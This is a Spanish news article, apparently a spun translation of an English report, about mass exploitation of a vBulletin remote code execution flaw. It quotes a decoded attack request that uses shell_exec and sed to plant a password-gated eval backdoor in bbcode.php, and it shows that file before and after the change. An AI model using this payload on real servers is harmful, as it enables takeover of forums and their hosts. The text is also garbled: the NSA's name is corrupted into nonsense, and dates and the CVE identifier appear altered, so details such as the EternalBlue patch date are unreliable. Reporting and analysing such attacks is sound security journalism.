vBoletín
Los atacantes están explotando en masa una vulnerabilidad divulgada de forma anónima que hace posible tomar el control de los servidores que ejecutan vBulletin, una de las aplicaciones más populares de Internet para comentarios en sitios web. Los sitios que ejecutan la aplicación deben desconectar los comentarios hasta que los administradores instalen un parche que los desarrolladores de vBulletin lanzaron el miércoles por la mañana.
La vulnerabilidad fue revelada a través de un exploit de 18 líneas que fue publicado el lunes por una persona no identificada. El exploit permite a los atacantes no autenticados ejecutar código malicioso de forma remota en casi cualquier servidor vBulletin que ejecute las versiones 5.0.0 hasta 5.5.4. La vulnerabilidad es tan grave y fácil de explotar que algunos críticos la han descrito como una puerta trasera.
“Esencialmente, cualquier ataque explota una inyección de comando súper simple”, dijo a Ars Ryan Seguin, ingeniero de investigación de Tenable. “Un atacante envía la carga útil, vBulletin luego ejecuta el comando y responde al atacante con lo que sea que haya pedido. Si un atacante emite un comando de shell como parte de la inyección, vBulletin ejecutará los comandos de Linux en su host con los permisos de usuario a los que tenga acceso la cuenta de usuario de nivel de sistema de vBulletins”. Seguin tiene más en este análisis técnico de la vulnerabilidad.
Según el investigador Troy Mursch del servicio de inteligencia de seguridad Bad Packets, los atacantes están utilizando botnets para explotar activamente los servidores vulnerables. Después de la decodificación, algunas de las solicitudes web que envían se ven así:
"widgetConfig[code]=echo shell_exec('sed -i \'s/eval(\$code);/if (isset(\$_REQUEST[\"epass\"]) \&\& \$_REQUEST[\"epass\"] == \"2dmfrb28nu3c6s9j\") { eval(\$code); }/g\' includes/vb5/frontend/controller/bbcode.php && echo -n exploited | md5sum'); exit;"
Antes de la solicitud web maliciosa, el código en una sección de vBulletin llamada
includes/vb5/frontend/controller/bbcode.php
se veía así:
function evalCode($code)
{
ob_start();
eval($code);
$output = ob_get_contents();
ob_end_clean();
return $output;
}
Después de que se ha enviado la solicitud web, la misma sección se cambia a esta:
function evalCode($code)
{
ob_start();
if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "2dmfrb28nu3c6s9j") { eval($code); }
$output = ob_get_contents();
ob_end_clean();
return $output;
}
Mursch le dijo a Ars:
El exploit anterior modifica
includes/vb5/frontend/controller/bbcode.phpa través del comando «sed» para agregar una puerta trasera al código. Esto se hace configurando una «contraseña» (epass) de 2dmfrb28nu3c6s9j. Al hacer esto, el sitio comprometido solo ejecutará código en la función eval si se establece 2dmfrb28nu3c6s9j en futuras solicitudes enviadas al servidor. Esto permitiría que un servidor de comando y control (C2) de botnet explote exclusivamente CVE-2023-16759 y emita comandos al sitio objetivo.
La vulnerabilidad en sí misma ha sido considerada por algunos como una puerta trasera. Este exploit intenta básicamente abrir sitios de puertas traseras a través de una puerta trasera. En cuanto a por qué los actores de amenazas están haciendo esto, es probable que creen un inventario de bots mientras encuentran formas adicionales de explotar los hosts comprometidos, como infectarlos con malware DDoS y realizar ataques de denegación de servicio.
Algunas de las computadoras infectadas que llevan a cabo los ataques han sido detectadas en el pasado utilizando el exploit EternalBlue, desarrollado y luego robado de la Agencia de Seguridad Marketingdecontenido, para comprometer las computadoras que aún no han instalado un parche que Microsoft lanzó a principios de 2023.
Algunos usuarios de vBulletin acudieron a las páginas de soporte oficiales del software el miércoles para informar que habían sido pirateados. «Recibí un correo electrónico hoy de mi proveedor de alojamiento que dice que ‘se detectó un código malicioso en su sitio web y una gran cantidad de mensajes de correo electrónico no deseado se originaron en él'», escribió un usuario aquí (se requiere una cuenta gratuita). Otro usuario informó que se eliminó una base de datos MySQL completa.
vBulletin se encuentra entre los sistemas de comentarios de sitios web más utilizados y probablemente se utilice en decenas de miles, posiblemente cientos de miles, de sitios. Afortunadamente, la versión 5x representa menos del 7% de las instalaciones activas, según W3techs, un sitio que analiza el software utilizado en Internet. Aún así, búsquedas en Internet como esta sugieren que 10,000 o más sitios pueden estar ejecutando versiones vulnerables.
Explotación disponible durante años
Según Chaouki Bekrar, fundador y director ejecutivo del corredor de exploits Zerodium, la vulnerabilidad ha estado circulando de forma privada durante años.
El reciente vBulletin pre-auth RCE 0day divulgado por un investigador sobre divulgación completa parece un bugdoor, un candidato perfecto para @PremiosPwnie 2023. Fácil de detectar y explotar.
Muchos investigadores estuvieron vendiendo este exploit durante años. @Zerodium los clientes lo sabían desde hace 3 años
— Chaouki Bekrar (@cBekrar) 25 de septiembre de 2023
“Muchos investigadores estuvieron vendiendo este exploit durante años”, dijo. escribió en Twitter. «Los clientes de Zerodium lo sabían desde hace 3 años».
La disponibilidad de un exploit funcional se ve agravada por otro script publicado públicamente que utiliza el sitio de búsqueda de Shodan para encontrar servidores vulnerables. Los atacantes pueden usarlo para generar una lista de sitios de vBulletin que son susceptibles y luego usar el exploit para apoderarse de ellos.
La vulnerabilidad, que se rastrea como CVE-2023-16759, existe en las instalaciones predeterminadas de las versiones afectadas. Según el análisis publicado públicamente por Tenable, “un atacante no autenticado puede enviar una solicitud HTTP POST especialmente diseñada a un host vBulletin vulnerable y ejecutar comandos. Estos comandos se ejecutarían con los permisos de la cuenta de usuario que utiliza el servicio vBulletin. Dependiendo de los permisos del usuario del servicio, esto podría permitir el control completo de un host”.
Como se indicó anteriormente, la vulnerabilidad es tan grave que los usuarios vulnerables de vBulletin deben desconectar sus foros hasta que hayan instalado un parche que los desarrolladores publicaron el miércoles por la mañana. El sistema de comentarios de Defcon.org, un sitio que se analiza regularmente en busca de vulnerabilidades fáciles de piratear, no estaba operativo en el momento en que se publicó esta publicación. Varias horas después, el foro de usuarios volvió.
El fundador de Defcon, Jeff Moss, le dijo a Ars que su equipo eliminó el sitio para evitar ser pirateado.
«Lo probamos de inmediato y ninguna de nuestras defensas nos hubiera salvado», dijo. «Revisamos los registros y demás y no hubo intentos de atacarnos, pero después de retroceder una línea hubo dos en los primeros 30 minutos. Definitivamente atacantes activos».
Antes de que un parche estuviera disponible, las personas informaron que pudieron mitigar con éxito la vulnerabilidad siguiendo las instrucciones aquí. Ahora que hay un parche disponible, los usuarios afectados de vBulletin deben instalarlo de inmediato.
Esta publicación se actualizó para agregar detalles de explotación de Mursch y comentarios de Moss.
